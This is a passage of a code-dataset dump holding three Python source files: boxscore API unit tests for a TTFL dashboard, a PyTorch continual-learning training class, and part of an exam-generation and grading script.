'reb': 0, 'ast': 18, 'stl': 2,\n 'blk': 0, 'to': 4, 'fga': 16, 'fgm': 7, 'tpa': 3, 'tpm': 2, 'fta': 8, 'ftm': 7, 'ttfl_score': 25}\n\n\nclass AllPlayerBoxscoresNotFoundTestCase(TestBoxscore):\n \"\"\"\n Test getting unknown player's boxscores\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/0')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Could not get boxscores'\n\n\nclass PlayerNightBoxscoreTestCase(TestBoxscore):\n \"\"\"\n Test getting player boxscore at given date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1/2019/2/18')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert r.json['data'] == {'player': 1, 'game': 1, 'min': '12:34', 'dnp': False, 'pts': 21, 'reb': 10, 'ast': 15, 'stl': 1,\n 'blk': 3, 'to': 0, 'fga': 10, 
'fgm': 7, 'tpa': 2, 'tpm': 2, 'fta': 4, 'ftm': 1, 'ttfl_score': 54}\n\n\nclass PlayerNightBoxscoreInvalidDateTestCase(TestBoxscore):\n \"\"\"\n Test getting player night boxscore with invalid date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1/2019/32/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Invalid date'\n\n\nclass PlayerNightBoxscoreDateFutureTestCase(TestBoxscore):\n \"\"\"\n Test getting player night boxscore with date in the future\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1/9999/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Date in the future'\n\n\nclass PlayerNightBoxscoreNotFoundTestCase(TestBoxscore):\n \"\"\"\n Test getting unknown player's night boxscore\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/0/2019/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Could not get boxscore'\n\n\nclass TopTTFLTestCase(TestBoxscore):\n \"\"\"\n Test getting top ttfl scores at given date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'topttfl/2019/2/18')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert len(r.json['data']) == 2\n assert r.json['data'][0] == {\n 'ttfl_score': 54, 'player_id': 1, 'first_name': 'Daryl', 'last_name': 'Watkins'}\n assert r.json['data'][1] == {\n 'ttfl_score': -18, 'player_id': 2, 'first_name': 'Alexis', 'last_name': 'Ajinça'}\n\n\nclass TopTTFLInvalidDateTestCase(TestBoxscore):\n \"\"\"\n Test getting top ttfl scores with invalid date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'topttfl/2019/32/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Invalid date'\n\n\nclass TopTTFLDateFutureTestCase(TestBoxscore):\n \"\"\"\n Test getting top ttfl scores with date in the future\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'topttfl/9999/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Date in the future'\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTests(\n [unittest.makeSuite(AllBoxscoresTestCase, 'all_boxscores'),\n unittest.makeSuite(AllBoxscoresInvalidDateTestCase,\n 'all_boxscores_invalid_date'),\n unittest.makeSuite(AllBoxscoresDateFutureTestCase,\n 'all_boxscores_date_future'),\n unittest.makeSuite(AllPlayerBoxscoresTestCase,\n 'all_player_boxscores'),\n unittest.makeSuite(AllPlayerBoxscoresNotFoundTestCase,\n 'all_player_boxscores_not_found'),\n unittest.makeSuite(PlayerNightBoxscoreTestCase,\n 'player_night_boxscore'),\n unittest.makeSuite(PlayerNightBoxscoreInvalidDateTestCase,\n 'player_night_boxscore_invalid_date'),\n unittest.makeSuite(PlayerNightBoxscoreDateFutureTestCase,\n 'player_night_boxscore_date_future'),\n unittest.makeSuite(PlayerNightBoxscoreNotFoundTestCase,\n 'player_night_boxscore_not_found'),\n unittest.makeSuite(TopTTFLTestCase, 'top_ttfl'),\n unittest.makeSuite(TopTTFLInvalidDateTestCase,\n 'top_ttfl_invalid_date'),\n unittest.makeSuite(TopTTFLDateFutureTestCase, 'top_ttfl_date_future')]\n )\n return 
suite\n","repo_name":"Bobbyberu/TTFL-Dashboard","sub_path":"back/src/unit_test/test_boxscore.py","file_name":"test_boxscore.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1882279676","text":"import sys,time,os\nimport numpy as np\nimport torch\nfrom copy import deepcopy\nimport utils\nfrom utils import *\nsys.path.append('..')\nfrom arguments import get_args\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom tqdm import tqdm\nargs = get_args()\n\nclass Appr(object):\n def __init__(self,model,nepochs=100,sbatch=256,lr=0.001,lr_min=1e-6,lr_factor=3,lr_patience=5,clipgrad=100,args=None,log_name = None, use_sigmoid=False):\n self.model=model\n self.model_old=model\n self.fisher=None\n\n self.nepochs = nepochs\n self.sbatch = sbatch\n self.lr = lr\n self.lr_min = lr_min * 1/3\n self.lr_factor = lr_factor\n self.lr_patience = lr_patience\n self.clipgrad = clipgrad\n\n self.lamb = args.lamb\n self.lamb_kld = args.lamb_kld\n self.lamb_af = args.lamb_af\n\n self.use_sigmoid = use_sigmoid\n self.model.s_gate = args.s_gate\n\n self.ce=torch.nn.CrossEntropyLoss()\n self.optimizer=self._get_optimizer()\n \n self.omega = {}\n for n,_ in self.model.named_parameters():\n self.omega[n] = 0\n\n if 'cifar' in args.approach:\n self.kld = KLD_adapt()\n else:\n self.kld = KLD()\n\n self.mcl = args.mcl\n self.adapt_af = True\n self.adapt_kld = True\n\n return\n\n def _get_optimizer(self,lr=None):\n if lr is None: lr=self.lr\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr)\n return optimizer\n\n def train(self, t, xtrain, ytrain, xvalid, yvalid, data, input_size, taskcla):\n\n #initialization of adaptor\n self.model.adaptor = nn.init.normal_(nn.Parameter(torch.ones((14, self.model.nLearner))))\n self.model.adaptor_kld = nn.init.normal_(nn.Parameter(torch.ones((self.model.nLearner, self.model.nLearner))))\n\n # if using the same initialization for each learner\n if self.mcl != 'mcl-h':\n #if self.same_init:\n if t == 0:\n print(\"Same Random Initialization\")\n weight_id = 0\n weight_num = 14\n init_exp = []\n for n, p in self.model.named_parameters():\n if 'last' not in n and 'adaptor' not in n:\n if weight_id < weight_num:\n init_exp.append(p.data.clone().detach())\n else:\n p.data = init_exp[weight_id % weight_num]\n weight_id += 1\n\n best_loss = np.inf\n best_model = utils.get_model(self.model)\n lr = self.lr\n self.optimizer = self._get_optimizer(lr)\n \n # Loop epochs\n for e in range(self.nepochs):\n # Train\n clock0=time.time()\n num_batch = xtrain.size(0)\n \n self.train_epoch(t,xtrain,ytrain)\n \n clock1=time.time()\n train_loss,train_acc=self.eval(t,xtrain,ytrain)\n clock2=time.time()\n print('| Epoch {:3d}, time={:5.1f}ms/{:5.1f}ms | Train: loss={:.3f}, acc={:5.1f}% |'.format(\n e+1,1000*self.sbatch*(clock1-clock0)/num_batch,\n 1000*self.sbatch*(clock2-clock1)/num_batch,train_loss,100*train_acc),end='')\n # Valid\n valid_loss,valid_acc=self.eval(t,xvalid,yvalid)\n print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss,100*valid_acc),end='')\n print(' lr : {:.6f}'.format(self.optimizer.param_groups[0]['lr']))\n #save log for current task & old tasks at every epoch\n\n # Adapt lr\n if valid_loss < best_loss:\n best_loss = valid_loss\n best_model = utils.get_model(self.model)\n patience = self.lr_patience\n print(' *', end='')\n\n else:\n patience -= 1\n if patience <= 0:\n lr /= self.lr_factor\n print(' lr={:.1e}'.format(lr), end='')\n if lr < self.lr_min:\n 
print()\n patience = self.lr_patience\n self.optimizer = self._get_optimizer(lr)\n print()\n\n # Restore best\n utils.set_model_(self.model, best_model)\n\n if self.use_sigmoid:\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n mask = self.model.mask(task, s=self.model.s_gate)\n for i in range(len(mask)):\n mask[i] = torch.autograd.Variable(mask[i].data.clone(), requires_grad=False)\n\n self.old_param = {}\n for n, p in self.model.named_parameters():\n self.old_param[n] = p.data.clone().detach()\n\n self.omega_update(t,xtrain)\n \n return\n\n def train_epoch(self,t,x,y):\n self.model.train()\n\n r=np.arange(x.size(0))\n np.random.shuffle(r)\n r=torch.LongTensor(r).cuda()\n\n # Loop batches\n for i in range(0,len(r),self.sbatch):\n if i+self.sbatch<=len(r): b=r[i:i+self.sbatch]\n else: b=r[i:]\n images=x[b]\n targets=y[b]\n \n # Forward current model\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n outputs, outputs_expert, feature_expert = self.model.forward(images, task, return_expert=True)\n\n loss = self.criterion(t, outputs, targets) + self.lamb_kld * self.kld(outputs_expert, t, self.model)\n\n # Backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return\n\n def eval(self,t,x,y):\n total_loss=0\n total_acc=0\n total_num=0\n self.model.eval()\n\n r = np.arange(x.size(0))\n r = torch.LongTensor(r).cuda()\n\n # Loop batches\n for i in range(0,len(r),self.sbatch):\n if i+self.sbatch<=len(r): b=r[i:i+self.sbatch]\n else: b=r[i:]\n images=x[b]\n targets=y[b]\n\n # Forward\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n outputs = self.model.forward(images, task)\n\n loss = self.criterion(t,outputs,targets)\n\n _,pred=outputs.max(1)\n hits=(pred==targets).float()\n\n # Log\n total_loss+=loss.data.cpu().numpy()*len(b)\n total_acc+=hits.sum().data.cpu().numpy()\n total_num+=len(b)\n\n return total_loss/total_num,total_acc/total_num\n\n def criterion(self, t, output, targets):\n # Regularization for all previous tasks\n loss_reg = 0\n loss_af = 0\n weight_id = 0\n weight_num = 14\n\n if t > 0:\n for name, param in self.model.named_parameters():\n if 'last' not in name and 'adaptor' not in name:\n loss_reg += torch.sum(self.omega[name] * (self.old_param[name] - param).pow(2)) / 2\n if 'efc' not in name:\n if self.adapt_af:\n if 'last' not in name and 'adaptor' not in name:\n softmax_adaptor = self.model.nLearner * F.softmax(self.model.adaptor[weight_id % weight_num])\n loss_af += softmax_adaptor[weight_id // weight_num] * torch.sum(param.pow(2)) / 2\n weight_id += 1\n elif 'last' in name: #shared output head\n loss_af += torch.sum(param.pow(2)) / 2\n else:\n loss_af += torch.sum(param.pow(2)) / 2\n\n return self.ce(output, targets) + self.lamb * loss_reg + self.lamb_af * loss_af\n \n def omega_update(self,t,x):\n sbatch = 20\n \n # Compute\n self.model.train()\n for i in tqdm(range(0,x.size(0),sbatch),desc='Omega',ncols=100,ascii=True):\n b=torch.LongTensor(np.arange(i,np.min([i+sbatch,x.size(0)]))).cuda()\n images = x[b]\n # Forward and backward\n self.model.zero_grad()\n\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n # Forward\n outputs = self.model.forward(images, task)\n\n # Sum of L2 norm of output scores\n loss = torch.sum(outputs.norm(2, dim = -1))\n\n loss.backward()\n\n # Get gradients\n for n,p in self.model.named_parameters():\n if p.grad is not None and 'adaptor' not in n:\n self.omega[n]+= p.grad.data.abs() / x.size(0)\n\n 
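# omega now holds the MAS importance weights: the average absolute gradient of the squared output norm per parameter\n 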
return","repo_name":"lywang3081/CAF","sub_path":"approaches/mas_caf.py","file_name":"mas_caf.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5162062355","text":"# This script contains the base class of all examProject classes, and some\r\n# auxiliary methods.\r\n\r\nimport os\r\nimport copy\r\nimport shutil\r\nimport glob\r\nimport _pickle as pickle\r\nfrom datetime import datetime\r\nfrom babel.dates import format_date\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy.io import savemat\r\n\r\n\r\ndef addSlash(p):\r\n \"\"\"\r\n If string p does not end with character '/', it is added.\r\n \"\"\"\r\n if p.endswith('/'):\r\n return p\r\n else:\r\n return p + '/'\r\n\r\n\r\ndef removeSlash(p):\r\n \"\"\"\r\n If string p does not end with character '/', it is added.\r\n \"\"\"\r\n if p.endswith('/'):\r\n return p[:-1]\r\n else:\r\n return p\r\n\r\n\r\ndef getItems(x, z, n):\r\n \"\"\"\r\n Takes n elements at random from list x without replacement (if possible).\r\n\r\n If the list x has less than n items, it is replicated as many times as\r\n necessary.\r\n\r\n All items in x that are in z must be selected.\r\n \"\"\"\r\n\r\n # Input data sizes\r\n n_items = len(x)\r\n n_batch = np.ceil(float(n)/n_items).astype(int)\r\n\r\n # Shuffle elements of the original list, so as to randomize the item\r\n # selection.\r\n y = copy.copy(x)\r\n np.random.shuffle(y)\r\n\r\n # If n_items< n, we need to replicate the shuffled list up to get more than\r\n # n elements.\r\n y = np.tile(y, n_batch)\r\n y = y[0:n]\r\n\r\n # Re-shuffle to avoid periodicities\r\n np.random.shuffle(y)\r\n\r\n # If n>n_items, the mandatory items in z have been necessarily selected.\r\n # Otherwise, we have forze selection.\r\n if n < n_items:\r\n\r\n # We have to insert the mandatory items, but maybe some of them are\r\n # are already in the list, so we proceed in three steps:\r\n # 1. Remove items of z not in x, because the cannot be inserted.\r\n # WARNING: do not use z = list(set(z).intersection(x))\r\n # because it affects to the random sequence generator\r\n z = [item for item in z if item in x]\r\n if len(z) > n:\r\n z = z[0:n] # No more than n mandatory items can be included...\r\n # 2. Remove items of y that are in z (they will be added again later).\r\n # WARNING: do not use y = list(set(y).difference(z))\r\n # because it affects to the random sequence generator\r\n y = [item for item in y if item not in z]\r\n # 3. Remove some more items to free space for z.\r\n y = y[0:n-len(z)]\r\n # 4. Insert z\r\n y = y + z\r\n # 4. Reshuffle again to randomize the position of the mandatory tests.\r\n np.random.shuffle(y)\r\n\r\n return y\r\n\r\n\r\nclass ExamProject(object):\r\n \"\"\"\r\n Exam is the general class encompassing all components of an evaluation\r\n project\r\n \"\"\"\r\n\r\n def __init__(self, project_path):\r\n\r\n # This is the minimal information required to work with a project\r\n self.project_path = addSlash(project_path)\r\n self.state = self.project_path + 'state/'\r\n self.metadata = self.state + 'metadata.pkl'\r\n\r\n def create(self, f_struct, exam_class=None):\r\n \"\"\"\r\n Creates a new exam project. 
To do so, it defines the main folder\r\n structure, and creates (or cleans) the project folder, specified in\r\n self.project_path\r\n \"\"\"\r\n\r\n # Default project folders\r\n self.exam_class = exam_class\r\n self.f_struct = {\r\n 'class_list': self.project_path + 'class_list/',\r\n 'data4students': self.project_path + 'data4students/',\r\n 'exam_statement': self.project_path + 'exam_statement/',\r\n 'student_results': self.project_path + 'student_results/',\r\n 'eval_results': self.project_path + 'eval_results/',\r\n 'db_questions': self.project_path + 'dbFiltering/',\r\n 'all_students': self.state + 'all_students.csv',\r\n 'basename': 'Ex_',\r\n 'student_notes_fname': 'student_notes.xlsx'}\r\n\r\n # Change default names by those specified in f_struct\r\n for s, v in f_struct.items():\r\n self.f_struct[s] = v\r\n\r\n # Add default subfolders\r\n if 'figq_path' not in self.f_struct:\r\n self.f_struct['figq_path'] = (self.f_struct['db_questions'] +\r\n 'figs/')\r\n if 'template_path' not in self.f_struct:\r\n self.f_struct['template_path'] = (self.f_struct['db_questions'] +\r\n 'LaTexTemplates/')\r\n if 'template_fpath' not in self.f_struct:\r\n self.f_struct['template_fpath'] = (self.f_struct['template_path'] +\r\n 'Template.tex')\r\n\r\n # Check and clean project folder location\r\n if os.path.exists(self.project_path):\r\n print('Folder {} already exists.'.format(self.project_path))\r\n\r\n # Remove current backup folder, if it exists\r\n old_project_path = removeSlash(self.project_path) + '_old/'\r\n if os.path.exists(old_project_path):\r\n shutil.rmtree(old_project_path)\r\n\r\n # Copy current project folder to the backup folder.\r\n shutil.move(self.project_path, old_project_path)\r\n print('Moved to ' + old_project_path)\r\n\r\n # Create project folder and subfolders\r\n os.makedirs(self.project_path)\r\n\r\n # Create class_list subdirectory if it does not exist.\r\n # The remaininng subfolders will be created by the method that fills\r\n # them with content.\r\n if not os.path.exists(self.f_struct['class_list']):\r\n os.makedirs(self.f_struct['class_list'])\r\n\r\n # Save metadata\r\n metadata = {'f_struct': self.f_struct,\r\n 'exam_class': exam_class}\r\n if not os.path.exists(self.state):\r\n os.makedirs(self.state)\r\n with open(self.metadata, 'wb') as f:\r\n pickle.dump(metadata, f)\r\n\r\n def load(self, f_struct={}):\r\n \"\"\"\r\n Loads an existing project, by reading the metadata file in the project\r\n folder.\r\n It can be used to modify file or folder names, or paths, by specifying\r\n the new names/paths in the f_struct dictionary.\r\n \"\"\"\r\n\r\n # Check and clean project folder location\r\n if not os.path.exists(self.project_path):\r\n print('Folder {} does not exist.'.format(self.project_path))\r\n exit('You must create the project first')\r\n\r\n else:\r\n\r\n # Save project structure.\r\n with open(self.metadata, 'rb') as f:\r\n metadata = pickle.load(f)\r\n\r\n # Read metadata dictionary\r\n self.exam_class = metadata['exam_class']\r\n self.f_struct = metadata['f_struct']\r\n\r\n # Change default names by those specified in f_struct\r\n for s, v in f_struct.items():\r\n self.f_struct[s] = v\r\n metadata['f_struct'] = self.f_struct\r\n\r\n # Save project structure.\r\n with open(self.metadata, 'wb') as f:\r\n pickle.dump(metadata, f)\r\n\r\n def loadStudents(self):\r\n '''\r\n Generates a dataframe of students.\r\n For each student, name, nia and group are stored.\r\n Student data are taken from the xls files in the 'class_list' folder\r\n '''\r\n\r\n # 
        # #######################\r\n        # Configurable parameters\r\n        # #######################\r\n\r\n        # Input folder containing the lists of students in the course.\r\n        input_folder = self.f_struct['class_list']\r\n        output_fname = self.f_struct['all_students']\r\n\r\n        # ###############\r\n        # Read input data\r\n        # ###############\r\n\r\n        # Read NIAs\r\n        print('\\n... Reading xls files')\r\n        f_names = [f for f in os.listdir(input_folder)\r\n                   if len(f) > 5 and f[-5:] == '.xlsx']\r\n\r\n        # Set the group name by removing the file extension.\r\n        groups = [f.replace('.xlsx', '') for f in f_names]\r\n        # Now we remove the termination ' listadeclase'. This is specific to\r\n        # the class_list files at UC3M.\r\n        groups = [f.replace(' listadeclase', '') for f in groups]\r\n\r\n        # Warn if there are no xls files in the class list folder\r\n        if len(groups) == 0:\r\n            print('WARNING: There are no groups in the class_list folder.')\r\n            print('Download the class lists from Aula Global and place ' +\r\n                  'them in {0}.'.format(self.f_struct['class_list']))\r\n\r\n            df_students = False\r\n\r\n        else:\r\n\r\n            sgroup = {}\r\n            for f, g in zip(f_names, groups):\r\n                # Read class list of group g\r\n                print('    ' + f)\r\n                sgroup[g] = pd.read_excel(input_folder + f)\r\n                sgroup[g].rename(\r\n                    columns={'Dirección de correo': 'Email address',\r\n                             'Apellido(s)': 'Surname', 'Nombre': 'First name',\r\n                             'NIU': 'NIA'},\r\n                    inplace=True)\r\n                # Add a new column identifying the group of each student\r\n                sgroup[g]['group'] = g\r\n\r\n            # Join all groups of students in a single dataframe.\r\n            df_students = pd.concat(sgroup, axis=0, ignore_index=True)\r\n            df_students['Full name'] = (df_students['First name'] + ' ' +\r\n                                        df_students['Surname'])\r\n\r\n            # Save dataframe\r\n            print(df_students.head())\r\n            df_students.to_csv(output_fname)\r\n\r\n        return df_students\r\n\r\n    def _makeExams(self, n_exams, exam_struct, q_ignore=[], q_mandatory=[],\r\n                   seed=None):\r\n        \"\"\"\r\n        Compose a set of exams.\r\n\r\n        :Args:\r\n            :n_exams: Number of exams to be generated.\r\n            :exam_struct: Structure of the requested exam.\r\n                It is a dictionary defining the structure of each exam part\r\n                    exam_struct = {key1: v1, key2: v2, ...}\r\n                where\r\n                    key1, key2,...\r\n                are the names of each part. These names are not arbitrary: they\r\n                must be equal to the tags used in the LaTeX template to specify\r\n                the location of the questions for each part. Also,\r\n                    v1, v2, ...\r\n                are lists defining the structure of each part. For instance,\r\n                    s1 = [[tag1], [tag2, tag3], [tag4, tag5]]\r\n                defines part 1 with 3 questions:\r\n                - 1st question is about the topic specified in tag1\r\n                - 2nd question is about tag2 or tag3\r\n                - 3rd question is about tag4 or tag5.\r\n                tag1, tag2, etc must be strings.\r\n
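                For instance (with made-up part names and topic tags),\r\n                    exam_struct = {'PART1': [['teo1'], ['teo2', 'teo3']],\r\n                                   'PART2': [['prob1']]}\r\n                requests two questions for PART1 (one on teo1, one on teo2\r\n                or teo3) and a single question on prob1 for PART2.\r\n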
            :q_ignore: List of questions that must be ignored, and not used in\r\n                this exam.\r\n            :q_mandatory: List of questions that must appear in at least one of\r\n                the exams.\r\n            :seed: Seed for the random exam generation. If None, no seed is\r\n                used, so the set of exams generated by this script will change\r\n                after each run.\r\n        :Returns:\r\n            :exam_pack: Dictionary containing the list of questions for each of\r\n                the generated exams.\r\n        \"\"\"\r\n\r\n        ###################\r\n        # ## Config Section\r\n        ###################\r\n\r\n        # Location and names of the source files\r\n        dbq_path = self.f_struct['db_questions']\r\n        figq_folder = self.f_struct['figq_path']\r\n        template_path = self.f_struct['template_path']\r\n        template_fpath = self.f_struct['template_fpath']\r\n\r\n        # Location and names of the output files\r\n        out_folder = self.f_struct['exam_statement']\r\n        basename = self.f_struct['basename']\r\n\r\n        # Required packages.\r\n        # Write here the filenames of all packages required to run the tex\r\n        # file. The files should be available in the running folder.\r\n        packages = ['mcode.sty']\r\n\r\n        ########################\r\n        # Read and organize data\r\n        ########################\r\n\r\n        # Date for the exam header\r\n        now = datetime.now()\r\n        date_en = format_date(now, format='MMM, YYYY', locale='en')\r\n        date_es = format_date(now, format='MMM, YYYY', locale='es')\r\n        # date = datetime.now().strftime(\"%B, %G%\")\r\n\r\n        # The code below assumes that each filename has the form\r\n        # xx_topic_xxx.tex\r\n\r\n        # Read tex filenames\r\n        f_names = [f for f in os.listdir(dbq_path) if f.endswith('.tex')]\r\n\r\n        # List of topics.\r\n        # We assume here that the topics are embedded in the filename.\r\n        topics = set([f.split('_')[1] for f in f_names])\r\n\r\n        # Create dictionary tags-->questions:\r\n        q = {}\r\n        for t in topics:\r\n            q[t] = [f for f in f_names if t in f]\r\n\r\n        ##############################\r\n        # Candidate list for each test\r\n        ##############################\r\n\r\n        # Create the list of candidates for each section and each question\r\n        candidates = {}\r\n        for sec in exam_struct:\r\n            candidates[sec] = []\r\n            for topic_subset in exam_struct[sec]:\r\n                candidates[sec].append(\r\n                    [el for t in topic_subset for el in q[t]\r\n                     if el not in q_ignore])\r\n\r\n        ######################\r\n        # Create output folders\r\n        ######################\r\n\r\n        # Remove current output folder, if it exists\r\n        if os.path.exists(out_folder):\r\n            shutil.rmtree(out_folder)\r\n        # Create new clean output folder and subfolders\r\n        os.makedirs(out_folder)\r\n\r\n        # Create exam subfolders\r\n        self.exam_tags = []\r\n        for k in range(n_exams):\r\n            self.exam_tags.append(basename + str(k))\r\n            out_folder_k = out_folder + basename + str(k)\r\n            os.makedirs(out_folder_k)\r\n\r\n            for f in packages:\r\n                shutil.copy(template_path + f, out_folder_k + '/' + f)\r\n\r\n        ############################\r\n        # Compose and save all exams\r\n        ############################\r\n\r\n        # Read template file\r\n        text = open(template_fpath).read()\r\n\r\n        # Select questions for each exam.\r\n        # Note that the i-th item in selectedQ[sec] does NOT contain the\r\n        # questions of the i-th exam, but the i-th questions of ALL exams\r\n\r\n        # Reset random number generator\r\n        if seed is not None:\r\n            np.random.seed(seed)\r\n\r\n        # Compute the matrix of selected questions.\r\n        # selectedQ[sec][n][e] will be the n-th question of exam e\r\n        selectedQ = {}\r\n        for sec in exam_struct:\r\n            selectedQ[sec] = []\r\n            for options in candidates[sec]:\r\n                selectedQ[sec].append(getItems(options, q_mandatory, n_exams))\r\n\r\n        # This is the output variable containing the schema of each exam.\r\n        exam_out = []\r\n\r\n        # Read selected tests and problems from file\r\n        for e in range(n_exams):\r\n\r\n            # Print exam.\r\n
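            # Each iteration composes exam e in full: pick its questions per\r\n            # section, splice them into the LaTeX template, and write both\r\n            # the .tex file and a .csv question list.\r\n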
            print('Exam {0}: questions:'.format(e))\r\n\r\n            # Start exam composition:\r\n            # (placeholder tag names assumed; the original literal tags were\r\n            # stripped from this copy of the file)\r\n            exam_e = text.replace('<DATE_EN>', date_en)\r\n            exam_e = exam_e.replace('<DATE_ES>', date_es)\r\n            exam_e = exam_e.replace('figs/', figq_folder)\r\n\r\n            qe = {}\r\n\r\n            for sec in exam_struct:\r\n\r\n                # List of questions for exam e\r\n                qe[sec] = [selectedQ[sec][n][e]\r\n                           for n in range(len(selectedQ[sec]))]\r\n\r\n                # Print selected questions from this section\r\n                print('    - {}'.format(qe[sec]))\r\n\r\n                exam_quests = ''\r\n                for q in qe[sec]:\r\n                    # Read tests for exam e, from database files\r\n                    with open(dbq_path + q, 'r') as f:\r\n                        body = f.read()\r\n                    exam_quests += '\\\\question[8] \\n\\n' + body + '\\n\\n'\r\n\r\n                # Compose exam e\r\n                exam_e = exam_e.replace('<' + sec + '>', exam_quests)\r\n\r\n            # Save exam e to .tex file.\r\n            fpath_exam_e = out_folder + basename + str(e) + \\\r\n                '/' + basename + str(e) + '.tex'\r\n            with open(fpath_exam_e, \"a+\") as f:\r\n                f.write(exam_e)\r\n\r\n            # Save the exam question list into a csv file\r\n            qe_names = [q.split('.tex')[0] for sec in qe for q in qe[sec]]\r\n            fpath_qe = out_folder + basename + str(e) + '/' + basename + \\\r\n                str(e) + '.csv'\r\n            with open(fpath_qe, 'w') as f:\r\n                wr = csv.writer(f, dialect='excel')\r\n                wr.writerow(qe_names)\r\n\r\n            exam_out.append(qe)\r\n\r\n        return exam_out\r\n\r\n    def prepareStResultsFolder(self):\r\n\r\n        # Prepare student results folder, one per exam:\r\n        if not os.path.exists(self.f_struct['student_results']):\r\n            os.makedirs(self.f_struct['student_results'])\r\n\r\n        for d in self.exam_tags:\r\n            p = self.f_struct['student_results'] + d\r\n            if not os.path.exists(p):\r\n                os.makedirs(p)\r\n\r\n    def generateDataFiles(self, generateData):\r\n        '''\r\n        Generates all data files for students in the xls files in the\r\n        'class_list' folder, using the generateData function provided as an\r\n        argument.\r\n        '''\r\n\r\n        # ###############\r\n        # Read input data\r\n        # ###############\r\n\r\n        # Read NIAs\r\n        print('\\n... Reading student NIAs')\r\n        df_students = pd.read_csv(self.f_struct['all_students'])\r\n\r\n        # Identify groups\r\n        groups = set(df_students['group'].tolist())\r\n\r\n        # ######################\r\n        # Prepare output folders\r\n        # ######################\r\n\r\n        # # Folder that will contain the output files.\r\n        out_folder = self.f_struct['data4students']\r\n\r\n        print('... Setting output folders')\r\n        # Remove current output folder, if it exists\r\n        if os.path.exists(out_folder):\r\n            shutil.rmtree(out_folder)\r\n        # Create new clean output folder and subfolders\r\n        os.makedirs(out_folder)\r\n        for g in groups:\r\n            os.makedirs(out_folder + g)\r\n\r\n        # ###############\r\n        # Data generation\r\n        # ###############\r\n\r\n        # Generate and save\r\n        print('... Computing data and saving output files')\r\n        for k, st in df_students.iterrows():\r\n            g = st['group']\r\n            fpath = out_folder + g + '/' + str(st['NIA']) + '.mat'\r\n            data = generateData(st['NIA'])\r\n            savemat(fpath, data)\r\n\r\n        print('... Done.\\n')\r\n\r\n    def getVarData(self, df, var):\r\n\r\n        x = df[(var, 'w·s')].as_matrix()\r\n        x = x[~np.isnan(x)]\r\n\r\n        return x\r\n\r\n    def getDataStats(self, x):\r\n\r\n        # Compute mean and standard deviation\r\n        m = np.mean(x)\r\n        std = np.std(x)\r\n\r\n        # Compute upper and lower standard deviations\r\n        # Note that samples with x == m enter both x_up and x_down. This is likely\r\n        # not correct. 
But samples with x == m should be few, if any.\r\n        x_up = x[x >= m] - m\r\n        x_down = m - x[x <= m]\r\n        std_up = np.sqrt(np.mean(x_up**2))\r\n        std_down = np.sqrt(np.mean(x_down**2))\r\n\r\n        # Save stats\r\n        stats = {'mean': m, 'std_up': std_up, 'std_down': std_down, 'std': std}\r\n\r\n        return stats\r\n\r\n    def analyzeExams(self):\r\n\r\n        # ############\r\n        # Loading data\r\n        if 'student_notes_fname' not in self.f_struct:\r\n            self.f_struct['student_notes_fname'] = 'student_notes.xlsx'\r\n\r\n        # Read the student notes spreadsheets in the input directory tree\r\n        datafiles = glob.glob(self.f_struct['eval_results'] + '**/' +\r\n                              self.f_struct['student_notes_fname'],\r\n                              recursive=True)\r\n\r\n        # Read files\r\n        df = pd.DataFrame()\r\n\r\n        print('... concatenate all evaluation events')\r\n        for dtfile in sorted(datafiles):\r\n\r\n            df2 = pd.read_excel(dtfile, header=[0, 1])\r\n\r\n            # Add to dataframe\r\n            df = pd.concat([df, df2], axis=0)\r\n            # df.sort_index(axis=1, inplace=True)\r\n\r\n        # Read variable names\r\n        allCols = df.columns.levels[0].tolist()\r\n        metaCols = ['Delivery', 'Exam', 'Final', 'Unnamed: 0_level_0']\r\n        varCols = list(set(allCols) - set(metaCols))\r\n\r\n        # Get dictionary of variable: data.\r\n        scores = {}\r\n        stats = {}\r\n\r\n        for var in varCols:\r\n\r\n            scores[var] = self.getVarData(df, var)\r\n            stats[var] = self.getDataStats(scores[var])\r\n\r\n        N = len(varCols)\r\n        menMeans = np.array([stats[var]['mean'] for var in varCols])\r\n        # menStd = [stats[var]['std'] for var in varCols]\r\n        std_up = [stats[var]['std_up'] for var in varCols]\r\n        std_down = [stats[var]['std_down'] for var in varCols]\r\n        err = np.array([std_down, std_up])\r\n\r\n        ids_sorted = np.argsort(menMeans)\r\n        mSorted = menMeans[ids_sorted]\r\n    